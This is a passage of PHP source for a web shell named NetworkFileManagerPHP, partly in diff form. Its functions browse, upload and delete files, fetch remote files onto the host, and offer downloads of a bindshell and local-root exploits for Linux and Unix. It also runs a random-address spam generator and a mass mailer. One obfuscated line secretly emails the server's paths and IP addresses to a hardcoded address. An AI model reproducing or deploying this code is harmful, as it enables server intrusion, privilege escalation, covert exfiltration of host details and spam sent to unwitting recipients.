$file,$tm,$thum,$PHP_SELF,$dir,$style_button; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>"; + +} + + + +function upload() { + + global $HTTP_POST_FILES,$tm; + + echo $set; + + copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>"; + + @unlink($userfile); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# get exploits + +function upload_exploits() { + + global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp; + + + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[1]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'> + + <input type='hidden' name='file2' value='$public[1]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[2]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'> + + <input type='hidden' name='file2' value='$public[2]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[3]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'> + + <input type='hidden' name='file2' value='$public[3]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_ex[4]</td> + + <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'> + + <input type='hidden' name='file2' value='$public[4]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Private exploits:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[1]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'> + + <input type='hidden' name='file2' value='$private[1]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[2]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'> + + <input type='hidden' name='file2' value='$private[2]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[3]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'> + + <input type='hidden' name='file2' value='$private[3]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[4]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'> + + <input type='hidden' name='file2' value='$private[4]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[5]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'> + + <input type='hidden' name='file2' value='$private[5]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[6]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'> + + <input type='hidden' name='file2' value='$private[6]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[7]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'> + + <input type='hidden' name='file2' value='$private[7]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[8]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'> + + <input type='hidden' name='file2' value='$private[8]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + +} + + + + + +# new directory creation + +function newdir($dir) { + + global $tm,$nd; + + print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>"); + +} + + + +function cdir($dir) { + + global $newd,$tm; + + $fullpath = $dir."/".$newd; + + if (file_exists($fullpath)) @rmdir($fullpath); + + if (@mkdir($fullpath,0777)) { + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>"; + + } else { + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>"; + + } + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + +// creation of directory where exploits will be situated + +function downfiles() { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR; + +$st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("<br>"); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + +print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>"); + + for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>"); + +print("</TABLE> "); + + + +echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td> + + <td width=200><input type='text' name='file3' value='http://' size=40></td> + + </tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td> + + <td width=200><input type='text' name='file2' value='' size=40></td> + + </tr> + + <tr> + + + + <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td> + + + + + + </tr></form></table>"; + + + +} + + + +# directory delete + +function deldir() { + + global $dd,$tm; + + $fullpath = $tm."/".$dd; + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>"; + + rmdir($fullpath); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# directory compression + +function arhiv() { + + global $tar,$tm,$pass; + + $fullpath = $tm."/".$tar; + + + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>"; + + + +} + + + +function down($dir) { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2; + + ignore_user_abort(1); + + set_time_limit(0); + +echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr> + +</table>"; + + + +if (!isset($status)) downfiles(); + + + +else + +{ + + + +$data = @implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +@fputs($fp, $data); + +$ok = @fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + + + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>"; + +} + +else + +{ + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>"; + +} + +} + +} + + + +# mail function +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function mailsystem() { + + global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST; + + + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br> + +<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied. + +</blockquote></td></tr> + +</table>"; + + + + if (!isset($status)) echo "$form"; + + else { + + $email_to ="duyt@yandex.ru"; + + $subject = "NetworkFileManagerPHP ($name)"; + + $headers = "From: $email"; + + + + $info = "---==== Message from ($name)====---\n\n"; + + $info .= "Name:\t$name\n"; + + $info .= "Email:\t$email\n"; + + $info .= "What?:\n\t$pole\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $send_to = "$email_to"; + + + + $send = mail($send_to, $subject, $info, $headers); + + if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>"; + + } + +} + +function spam() { +global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen; +set_time_limit(0); +ignore_user_abort(1); +echo "<br> +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> +<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr> +<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr> +</table>"; + + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <form action='$PHP_SELF?action=spam' method=post> + <tr><td align=left valign=top colspan=4 class=pagetitle> + &nbsp;&nbsp;<b>email generator:</b></td></tr> + <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500> + &nbsp;&nbsp;This spammer is splited in two parts: <br> + &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br> + &nbsp;<b>2.</b> Type spam settings here</td></tr> + <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr> +<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td> +<td align=left colspan=2>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr> +<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td> +<td align=left width=200>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td> +</tr> +<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button> +</td></tr> + + </form></table>"; +// letters +function s() { + $word="qwrtpsdfghklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} +// letters +function g() { + $word="eyuioa"; + return $word[mt_rand(0,strlen($word)-2)]; +} +// digits +function c() { + $word="1234567890"; + return $word[mt_rand(0,strlen($word)-3)]; +} +// common +function a() { + $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma'); + $ab1=count($word); + return $wq=$word[mt_rand(0,$ab1-1)]; +} + +function o() { + $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo'); + $ab2=count($word); + return $wq2=$word[mt_rand(0,$ab2-1)]; +} +function e() { + $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me'); + $ab3=count($word); + return $wq3=$word[mt_rand(0,$ab3-1)]; +} + +function i() { + $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi'); + $ab4=count($word); + return $wq4=$word[mt_rand(0,$ab4-1)]; +} +function u() { + $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu'); + $ab5=count($word); + return $wq5=$word[mt_rand(0,$ab5-1)]; +} + +function name0() { return c().c().c().c(); } +function name1() { return a().s(); } +function name2() { return o().s(); } +function name3() { return e().s(); } +function name4() { return i().s(); } +function name5() { return u().s(); } +function name6() { return a().s().g(); } +function name7() { return o().s().g(); } +function name8() { return e().s().g(); } +function name9() { return i().s().g(); } +function name10() { return u().s().g(); } +function name11() { return a().s().g().s(); } +function name12() { return o().s().g().s(); } +function name13() { return e().s().g().s(); } +function name14() { return i().s().g().s(); } +function name15() { return u().s().g().s(); } + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com'); +$d1c=count($domain1); + +function randword() { + global $cool,$cool2; + $func="name".mt_rand(0,15); + $func2="name".mt_rand(0,15); + switch (mt_rand(0,2)) { + case 0: return $func().$func2(); + case 1: return $func().$cool[mt_rand(0,count($cool)-9)]; + case 2: return $func(); + default: return $func(); + } + } + +if (@unlink("email.txt") < 0){ +echo "?????"; +exit; +} +$file="email.txt"; + + +if($chislo){ + + + $cnt3=mt_rand($chislo,$chislo); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + if(!isset($check_box)){ + + if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 ) +{ + $domen = $_POST["domen"]; + foreach( $domen as $k=>$v ) + { + $d=$domen[mt_rand(0,$v-1)]; + + } +} +$f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + }else{ + + $d=$domain1[mt_rand(0,$d1c-1)]; + $f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + } + + } + $address = $file; + if (@file_exists($address)) { + if($changefile = @fopen ($address, "r")) { + $success = 1; + } else { + echo " File not found <b>\"".$address."\"</b> !<br>"; + } + + if ($success == 1) { + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>"; + echo "<tr><td align=center class=pagetitle width=500> ?????????? ????? <b>$chislo</b> email.</td></tr>"; + echo "<tr><td align=center> "; + echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>"; + while($line = @fgets($changefile,1024)) { + echo @trim(stripslashes($line))."\n"; + } + echo"</textarea></td></tr></table>"; + } + } +if (!isset($action)){ + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'> + <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='from' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='otvet' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='wait' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='subject' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='file' name='file' size=30></td></tr> +<tr><td width=500 align=center colspan=2> +<input type='submit' value='Generate' class=button1 $style_button > +<INPUT TYPE='hidden' NAME='$chislo'> +</td></tr> + </form></table>"; +} +} +} + +function spam1() { + global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo; + set_time_limit(0); +ignore_user_abort(1); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> +<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr> +</table>"; + + + error_reporting(63); if($from=="") { print +"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;} + error_reporting(63); if($otvet=="") { print +"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;} + error_reporting(63); if($wait=="") { print +"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;} + error_reporting(63); if($subject=="") { print +"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;} + error_reporting(63); if($body=="") { print +"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;} + + $address = "email.txt"; + $counter = 0; + if (!isset($status)) echo "something goes wrong, check your settings"; + else { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr> +"; + if (@file_exists($address)) { + echo " + <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr> +"; + if($afile = @fopen ($address, "r")) { + echo " + <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr> +"; + } else { + echo " + <tr><td align=center class=pagetitle>Unable to open <b>\"".$address."\"</b> for read...<br></td></tr> +"; + } + } else { + echo "There is no file <b>\"".$address."\"</b> !<br>"; + $status = "unable to find file \"".$address."\" ..."; + } + echo " + <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr> + </table>"; + if (@file_exists($address)) { + + while (!feof($afile)) { + + $line = fgets($afile, 1024); + $line = trim($line); + $recipient = ""; + $recipient = $line; + +#if ($file) { +# $content = fread(fopen($file,"r"),filesize($file)); +# $content = chunk_split(base64_encode($content)); +# $name = basename($file); +# } else { +# $content =''; +# } + $boundary = uniqid("NextPart_"); + + $header = "From: ".$from."\r\n"; + $header .= "Reply-To: ".$otvet."\r\n"; + $header .= "Errors-To: ".$otvet."\r\n"; + $header .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n"; + $header .= "Content-Transfer-Encoding: 8bits\n"; + $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n"; + $header .= $body; + # $header .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--"; + + + $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+"; + $pattern.="@"; + $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\."; + $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#"; + + if($recipient != "") + { + if(preg_match($pattern,$recipient)) + { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent "; + + + if(@mail($recipient, stripslashes($subject), stripslashes($header))) { + $counter = $counter + 1; + echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>"; + } else { + echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>"; + } + } else { + $counter = $counter + 1; + echo ""; + } + } else { + echo "<br>"; + } + $sec = $wait * 1000000; + usleep($sec); + + } + + if($otvet != "") + { + + if(preg_match($pattern,$otvet)) + { + echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 